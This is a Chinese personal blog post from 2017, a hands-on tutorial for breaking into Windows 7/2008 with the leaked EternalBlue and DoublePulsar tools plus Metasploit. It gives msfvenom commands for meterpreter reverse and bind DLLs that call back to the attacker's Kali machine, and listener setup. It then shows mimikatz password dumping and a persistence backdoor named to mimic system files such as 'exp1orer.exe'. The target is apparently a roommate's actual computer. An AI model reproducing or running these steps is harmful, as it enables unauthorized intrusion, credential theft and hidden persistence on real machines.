<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>[ShadowBroker]1：NSA工具集EternalBlue + Doublepulsar + meterpreter渗透Windows 7/2008，兼谈Windows Server 2003中文版渗透 | 土豆不好吃</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="[v_error]警告： 本文仅供实验性研究，请勿用于非法用途，出啥事我不负责。真的！别算我头上，我胆小害怕。 好吧，如果这免责声明能管用的话……[&#x2F;v_error] 有个歪果仁写了一系列文章，蛮详细的，如果有兴趣的话可以戳去读一读吧：_From git clone to Pwned - Owning Windows with DoublePulsar and EternalBlue_">
<meta property="og:type" content="article">
<meta property="og:title" content="[ShadowBroker]1：NSA工具集EternalBlue + Doublepulsar + meterpreter渗透Windows 7&#x2F;2008，兼谈Windows Server 2003中文版渗透">
<meta property="og:url" content="http://example.com/2017/04/22/shadowbroker/index/index.html">
<meta property="og:site_name" content="土豆不好吃">
<meta property="og:description" content="[v_error]警告： 本文仅供实验性研究，请勿用于非法用途，出啥事我不负责。真的！别算我头上，我胆小害怕。 好吧，如果这免责声明能管用的话……[&#x2F;v_error] 有个歪果仁写了一系列文章，蛮详细的，如果有兴趣的话可以戳去读一读吧：_From git clone to Pwned - Owning Windows with DoublePulsar and EternalBlue_">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke1.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke2.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke3.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke4.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke5.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke6.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke7.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke8.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke9.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke10.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke11.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke12.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke13.png">
<meta property="og:image" content="http://example.com/images/042217_1027_ShadowBroke14.png">
<meta property="article:published_time" content="2017-04-22T00:00:00.000Z">
<meta property="article:modified_time" content="2023-05-15T18:16:49.021Z">
<meta property="article:author" content="Benny小土豆">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/042217_1027_ShadowBroke1.png">
  
    <link rel="alternate" href="/atom.xml" title="土豆不好吃" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/typeface-source-code-pro@0.0.71/index.min.css">

  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 6.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">土豆不好吃</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-shadowbroker/index" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2017/04/22/shadowbroker/index/" class="article-date">
  <time class="dt-published" datetime="2017-04-22T00:00:00.000Z" itemprop="datePublished">2017-04-22</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/justsay/">justsay</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      [ShadowBroker]1：NSA工具集EternalBlue + Doublepulsar + meterpreter渗透Windows 7/2008，兼谈Windows Server 2003中文版渗透
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <p>[v_error]警告： 本文仅供实验性研究，请勿用于非法用途，出啥事我不负责。真的！别算我头上，我胆小害怕。 好吧，如果这免责声明能管用的话……[&#x2F;v_error]</p>
<p>有个歪果仁写了一系列文章，蛮详细的，如果有兴趣的话可以戳去读一读吧：_<a target="_blank" rel="noopener" href="http://www.pwn3d.org/posts/1721872-from-git-clone-to-pwned-owning-windows-with-doublepulsar-and-eternalblue-part-1">From git clone to Pwned - Owning Windows with DoublePulsar and EternalBlue</a>_ </p>
<p>目前，某些特定版本的Windows 10也可以了，可以参见这个PR <a target="_blank" rel="noopener" href="https://github.com/rapid7/metasploit-framework/pull/9473">https://github.com/rapid7/metasploit-framework/pull/9473</a></p>
<h2 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h2><p>几个星期之前Shadow Broker把NSA的黑客工具偷出来并公布了，据说这些工具非常强大，一个小毛孩都能拿着这些黑掉大半个瘟斗士……嗯，今天我这小毛孩跟你们说下，确实如此好吧。</p>
<p>本文我们将会集中讨论在Windows上使用EternalBlue来渗透Windows 7&#x2F;2008，然后使用插件Doublepulsar来注入dll。咱使用的工具是NSA的”metasploit”，名为”FuzzBunch”</p>
<h3 id="为啥选择EternalBlue"><a href="#为啥选择EternalBlue" class="headerlink" title="为啥选择EternalBlue"></a>为啥选择EternalBlue</h3><p>在NSA泄露的那对工具之中，EternalBlue是唯一一个能够攻击Windows 7和Windows Server 2008、并且不需要任何认证信息的工具；在expliot成功之后，我们使用Doublepulsar将我们制作的恶意dll注入系统进程中，从而拿到shell</p>
<h3 id="概念解释"><a href="#概念解释" class="headerlink" title="概念解释"></a>概念解释</h3><p><strong>exploit</strong>：就是用来触发漏洞的程序</p>
<p><strong>payload</strong>：就是触发漏洞之后执行的代码。如果exploit是火药的话，payload就是（具有杀伤力的）弹头</p>
<p><strong>framework</strong>：为了方便使用、测试、研究，人们把这么一大堆东西放到一起做成一个”框架”，咱可以在这一个框架里完成exploit、payload等操作，不用来回切换，嗯粗略理解就是个这么玩意。</p>
<h2 id="准备实验环境"><a href="#准备实验环境" class="headerlink" title="准备实验环境"></a>准备实验环境</h2><p>我们需要准备三台电脑，好吧，其实虚拟机就够了（记得设置成桥接）。并且这三台电脑要在同一局域网下，也就意味着能够互相ping通</p>
<h3 id="目标机、靶机：-Windows-7-x64-SP1：172-26-99-211"><a href="#目标机、靶机：-Windows-7-x64-SP1：172-26-99-211" class="headerlink" title="目标机、靶机： Windows 7 x64 SP1：172.26.99.211"></a>目标机、靶机： Windows 7 x64 SP1：172.26.99.211</h3><p>Windows 7、Windows server 2008在此作为我们的靶机，也就是受害者。我们啥也不需要知道，只要有个IP、能够ping通就好了。</p>
<p>感谢我室友那英勇就义的电脑啊！</p>
<h3 id="攻击机1-FuzzBunch（主要）：Windows-XP-SP3-172-26-97-206"><a href="#攻击机1-FuzzBunch（主要）：Windows-XP-SP3-172-26-97-206" class="headerlink" title="攻击机1 FuzzBunch（主要）：Windows XP SP3:172.26.97.206"></a>攻击机1 FuzzBunch（主要）：Windows XP SP3:172.26.97.206</h3><p>我们用XP来运行FuzzBunch。我猜没人想用wine吧？为啥用xp呢？xp比较小，在虚拟机中安装速度比较快，省时间，省硬盘，嗯……</p>
<h3 id="攻击机2-Metasploit（次要）：Kali-Linux-172-26-96-152"><a href="#攻击机2-Metasploit（次要）：Kali-Linux-172-26-96-152" class="headerlink" title="攻击机2 Metasploit（次要）：Kali Linux :172.26.96.152"></a>攻击机2 Metasploit（次要）：Kali Linux :172.26.96.152</h3><p>任何一个Linux发行版都可以，只要能够运行metasploit即可；如果实在不会用Linux，在Windows下使用metasploit也算可以吧。</p>
<p><a target="_blank" rel="noopener" href="https://www.rapid7.com/products/metasploit/download/">metasploit地址戳我</a></p>
<h2 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>准备工作</h2><p>正常来说，咱在做坏事之前，必然要先做一些搜集信息的工作，最常用的工具就是nmap啦！</p>
<p>咱使用nmap 来探测目标的信息，发现445简直就是福利。使用参数-O代表探测操作系统，-A代表all。</p>
<p><img src="/images/042217_1027_ShadowBroke1.png"></p>
<p>Target is all set, blow it! :wink: </p>
<h2 id="配置FuzzBunch"><a href="#配置FuzzBunch" class="headerlink" title="配置FuzzBunch"></a>配置FuzzBunch</h2><p>FuzzBunch需要Python2.6、旧版本的PyWin32</p>
<p>Python2.6：<a target="_blank" rel="noopener" href="https://www.python.org/download/releases/2.6/">https://www.python.org/download/releases/2.6/</a>（记得加到环境变量里）</p>
<p>PyWin32 v2.12：<a target="_blank" rel="noopener" href="https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/">https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/</a></p>
<p>当然还有这套工具了：<a target="_blank" rel="noopener" href="https://github.com/misterch0c/shadowbroker">https://github.com/misterch0c/shadowbroker</a></p>
<p>咱把这些东西都准备妥当了，然后编辑<code>windows/fb.py</code>，注释72行</p>
<p>大概就是如图所示：</p>
<p><img src="/images/042217_1027_ShadowBroke2.png"></p>
<p>之后再改FuzzBunch.xml，19和24行改成和你XP上一样的正确的路径。<img src="/images/042217_1027_ShadowBroke3.png"></p>
<p>之后我们切到对应的目录中，然后执行<code>python fb.py</code>，当当当！</p>
<p><img src="/images/042217_1027_ShadowBroke4.png"></p>
<p>默认的目标IP，就写我们的Windows 7咯，也就是172.26.99.211，下一个callback IP，就是XP的IP，然后Redirection输入no；</p>
<p><img src="/images/042217_1027_ShadowBroke5.png"></p>
<p>下一步，fz让我们给起个名字，由于我已经运行过了，所以就选择create a new project啦</p>
<p><a target="_blank" rel="noopener" href="https://dmesg.app/wp-content/uploads/2017/04/042217_1027_ShadowBroke6.png"><img src="/images/042217_1027_ShadowBroke6.png"></a></p>
<h2 id="使用EternalBlue攻击目标"><a href="#使用EternalBlue攻击目标" class="headerlink" title="使用EternalBlue攻击目标"></a>使用EternalBlue攻击目标</h2><p>第一步，咱要用EternalBlue来exploit目标，使用方法类似metasploit</p>
<p>use EternalBlue</p>
<p><img src="/images/042217_1027_ShadowBroke7.png"></p>
<p>啥都不管一直按回车使用默认值，除了在mode的时候选择2：FB</p>
<p><img src="/images/042217_1027_ShadowBroke8.png"></p>
<p>最后EternalBlue会问我们是否执行？直接回车吧。</p>
<p>如果不出意外的话，就应该成功了嗯……</p>
<p><img src="/images/042217_1027_ShadowBroke9.png"></p>
<p>当然要是出意外了，可能就会提示fail，咱要么<code>execute</code>再运行一下，要么就是目标机蓝屏啥了……嗯反正多试试吧。</p>
<h2 id="制作恶意dll"><a href="#制作恶意dll" class="headerlink" title="制作恶意dll"></a>制作恶意dll</h2><p>NSA的这堆exploit是很强大，但是payload感觉好像就弱了一些，像Doublepulsar能够注入dll、shellcode，好像没有metasploit那么强大哎？</p>
<p>没关系，咱用metasploit生成一个dll，交给Doublepulsar注入就好了。</p>
<p>在生成dll之前，咱首先要学习下metasploit中的meterpreter的几种类型：</p>
<p>meterpreter就是一个跨平台的shell，功能很强大，嘿嘿嘿。通常来说meterpreter有这么两种模式：正向和反向</p>
<p><strong>bind</strong>：攻击者连接目标机器的模式，通常比较适合内网渗透，有时会被防火墙拦下</p>
<p><strong>reverse</strong>：目标机连接攻击者的模式，基本上不会被防火墙阻拦。估计岁数大的小盆友们可能知道灰鸽子？这玩意就是反弹到攻击者的啦。</p>
<p>当然，这俩还能够细分为tcp、http、https，区别是啥，自己看帮助去！</p>
<p>这里咱就创建一个reverse_tcp啦。</p>
<p>需要注意的是，Doublepulsar要求比较多，64位的系统必须用64位的dll，32位的当然只能用32位的了，所以别搞错了。</p>
<p>咱直接打开终端，输入如下命令：</p>
<p>msfvenom -p windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;172.26.96.152 LPORT&#x3D;8089 -f dll &gt;reverse.dll</p>
<p>其中LHOST代表kali的IP地址，LPORT代表本地监听的地址（因为要反弹嘛），生成的文件名字为reverse.dll</p>
<p>我们只要简单的把这个dll拷贝到xp中即可。哎，咋拷贝最方便呢？没装虚拟机的辅助工具？没关系，在dll的存放目录下来一句<code>python –m SimpleHTTPServer 80</code></p>
<p>拿起XP里久违的IE6，访问kali的IP然后下载那个dll就好了嘛。</p>
<p>然后咱就让metasploit开启监听吧！</p>
<p>set PAYLOAD windows&#x2F;x64&#x2F;meterpreter&#x2F;reverse_tcp<br>use exploit&#x2F;multi&#x2F;handler<br>set lhost 172.26.96.152<br>set LPORT 8089<br>run</p>
<p><img src="/images/042217_1027_ShadowBroke10.png"></p>
<p>附录： 生成bind模式的meterpreter</p>
<p>#32位<br>msfvenom -p windows&#x2F;meterpreter&#x2F;bind_tcp RHOST&#x3D;10.1.1.71 LPORT&#x3D;8089 -f dll &gt;x86bind.dll<br>#64位<br>msfvenom -p windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp RHOST&#x3D;10.1.1.71 LPORT&#x3D;8089 -f dll &gt;x64bind.dll</p>
<p>RHOST为目标机的IP、LPORT为目标机开的端口号</p>
<h2 id="使用Doublepulsar注入我们的恶意dll"><a href="#使用Doublepulsar注入我们的恶意dll" class="headerlink" title="使用Doublepulsar注入我们的恶意dll"></a>使用Doublepulsar注入我们的恶意dll</h2><p>use DoublePulsa</p>
<p>老样子，一路回车，除了Architecture选择x64，Function选RunDLL，然后输入DLL路径。</p>
<p><img src="/images/042217_1027_ShadowBroke11.png"></p>
<p>如果运气好的话，嘿嘿嘿……</p>
<p><img src="/images/042217_1027_ShadowBroke12.png"></p>
<h2 id="之后该做什么呢"><a href="#之后该做什么呢" class="headerlink" title="之后该做什么呢"></a>之后该做什么呢</h2><h3 id="获取管理员密码"><a href="#获取管理员密码" class="headerlink" title="获取管理员密码"></a>获取管理员密码</h3><p>当然第一步是吧管理员密码搞出来了，怎么办呢？很简单啦其实</p>
<p>load mimikatz<br>wdigest</p>
<p><img src="/images/042217_1027_ShadowBroke13.png"></p>
<p>哎这兄弟有我这样的室友真是悲剧啊……</p>
<h3 id="植入持久后门"><a href="#植入持久后门" class="headerlink" title="植入持久后门"></a>植入持久后门</h3><p>万一目标重启了，咱就要重新exploit、植入dll（因为这玩意是跑在内存里的），多不方便，所以不如咱植入个持久后门嘛，当然，咱要先交叉编译一个后门……</p>
<p>嗯其实就是，自己看着来，大概就是：</p>
<p>msfpc windows 172.26.99.211 443 bind verbose</p>
<p><img src="/images/042217_1027_ShadowBroke14.png"></p>
<p>之后meterpreter里来这么一句</p>
<p>run post&#x2F;windows&#x2F;manage&#x2F;persistence_exe REXENAME&#x3D;cmd.exe REXEPATH&#x3D;&#x2F;root&#x2F;backdoor&#x2F;miao.exe STARTUP&#x3D;USER</p>
<p>其中REXENAME是拷贝到目标系统中的名字，咱取个比较有迷惑性的，比如说exp1orer.exe啦（注意是1不是l），cmd.exe啦，httpd.exe啦等等吧；REXEPATH是后门在本地的位置，STARTUP有USER、SYSTEM、SERVICE这三种取值。看参数就知道是啥意思了。</p>
<h2 id="最后的话"><a href="#最后的话" class="headerlink" title="最后的话"></a>最后的话</h2><p>反正我们是啥都没要，一个IP就成功的黑了进去。颇有当年ms08-067的风范。</p>
<p>可怕的地方就是，看文件的时间戳，NSA在2011年就有了EternalBlue……你再看这文件名Eternal永远的永恒的……</p>
<p>等等……标题里还说了要黑Windows Server 2003不是？可是metasploit里的那个不支持中文版的Windows Server 2003啊……所以，要么咱用修改版的ms08-067，要么用NSA的那个。</p>
<p>修改版的ms-08-067戳我，<a target="_blank" rel="noopener" href="http://bbs.pediy.com/thread-186737.htm">来源戳我</a>，地址与使用方法戳章鱼猫 [gt href&#x3D;’<a target="_blank" rel="noopener" href="https://github.com/BennyThink/ms08-067/_Server/_2003/_Chinese/_Version'/]%E5%BC%80%E6%BA%90%E8%90%8C%E8%90%8C%E5%93%92%E7%AB%A0%E9%B1%BC%E7%8C%AB/[/gt/]">https://github.com/BennyThink/ms08-067\_Server\_2003\_Chinese\_Version&#39;\]开源萌萌哒章鱼猫\[/gt\]</a></p>
<h1 id="参考资料："><a href="#参考资料：" class="headerlink" title="参考资料："></a>参考资料：</h1><p>exploit db论文： <a target="_blank" rel="noopener" href="https://www.exploit-db.com/docs/41896.pdf">How to Exploit ETERNALBLUE and DOUBLEPULSAR on Windows 7&#x2F;2008</a></p>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2017/04/22/shadowbroker/index/" data-id="clhp7rtjt008is2qr2l3ycqyu" data-title="[ShadowBroker]1：NSA工具集EternalBlue + Doublepulsar + meterpreter渗透Windows 7/2008，兼谈Windows Server 2003中文版渗透" class="article-share-link"><span class="fa fa-share">Share</span></a>
      
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2017/04/28/git-password/index/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          不小心把密码上传到GitHub了，怎么办
        
      </div>
    </a>
  
  
    <a href="/2017/04/06/quic/index/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">前卫一下：给你的网站开启QUIC</div>
    </a>
  
</nav>

  
</article>


</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/azure/">azure</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/azure/program/">program</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/china/">china</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/china/justsay/">justsay</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/cloudflare/">cloudflare</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/gfw/">gfw</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/it/">it</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/it/justsay/">justsay</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/it/linux/">linux</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/it/security/">security</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/it/share/">share</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/justsay/">justsay</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/justsay/gfw/">gfw</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/justsay/program/">program</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux/">linux</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/linux/security/">security</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/linux/website/">website</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/program/">program</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/program/share/">share</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/security/">security</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/security/justsay/">justsay</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/security/program/">program</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/share/">share</a></li><li class="category-list-item"><a class="category-list-link" href="/categories/website/">website</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/website/program/">program</a></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/what/">what</a><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/what/gfw/">gfw</a></li></ul></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/linux/" rel="tag">linux</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ubuntu/" rel="tag">ubuntu</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/linux/" style="font-size: 10px;">linux</a> <a href="/tags/ubuntu/" style="font-size: 10px;">ubuntu</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2025/03/">March 2025</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/12/">December 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/11/">November 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/10/">October 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/09/">September 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/08/">August 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/07/">July 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/04/">April 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/03/">March 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2024/02/">February 2024</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/12/">December 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/11/">November 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/05/">May 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/04/">April 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/03/">March 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/02/">February 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2023/01/">January 2023</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/09/">September 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/08/">August 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">July 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/06/">June 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/05/">May 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/02/">February 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/12/">December 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/11/">November 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/10/">October 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/08/">August 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/07/">July 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/06/">June 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/04/">April 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/02/">February 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/01/">January 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/12/">December 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/10/">October 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/09/">September 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/07/">July 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/04/">April 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/03/">March 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/01/">January 2020</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/12/">December 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/11/">November 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/10/">October 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/08/">August 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/07/">July 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/06/">June 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/04/">April 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/03/">March 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/02/">February 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/01/">January 2019</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/12/">December 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/11/">November 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/09/">September 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/08/">August 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/07/">July 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/05/">May 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/04/">April 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/03/">March 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2018/02/">February 2018</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/12/">December 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/11/">November 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/10/">October 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/09/">September 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/08/">August 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/07/">July 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/06/">June 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/05/">May 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/04/">April 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/03/">March 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/02/">February 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2017/01/">January 2017</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/12/">December 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/11/">November 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/10/">October 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/09/">September 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/08/">August 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/07/">July 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/06/">June 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/05/">May 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/04/">April 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/03/">March 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/02/">February 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2016/01/">January 2016</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/12/">December 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/11/">November 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/10/">October 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/09/">September 2015</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/08/">August 2015</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2025/03/16/py-azure-oai-proxy/index/">使用50行Python代码实现一个Azure OpenAI Proxy</a>
          </li>
        
          <li>
            <a href="/2024/12/12/candlestick-llm/index/">使用Python 通过K线计算技术指标，并用 LLM 预测趋势</a>
          </li>
        
          <li>
            <a href="/2024/11/03/warp-http-proxy/index/">把 Cloudflare WARP 转换为 http 代理</a>
          </li>
        
          <li>
            <a href="/2024/10/12/aca-php/index/">用 Azure Container Apps 运行PHP网站</a>
          </li>
        
          <li>
            <a href="/2024/10/06/aca-vm-scale/index/">Azure Container Apps 连接到虚拟机并配置CPU自动缩放</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      
      &copy; 2025 Benny小土豆<br>
      Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>

    </div>
    <nav id="mobile-nav">
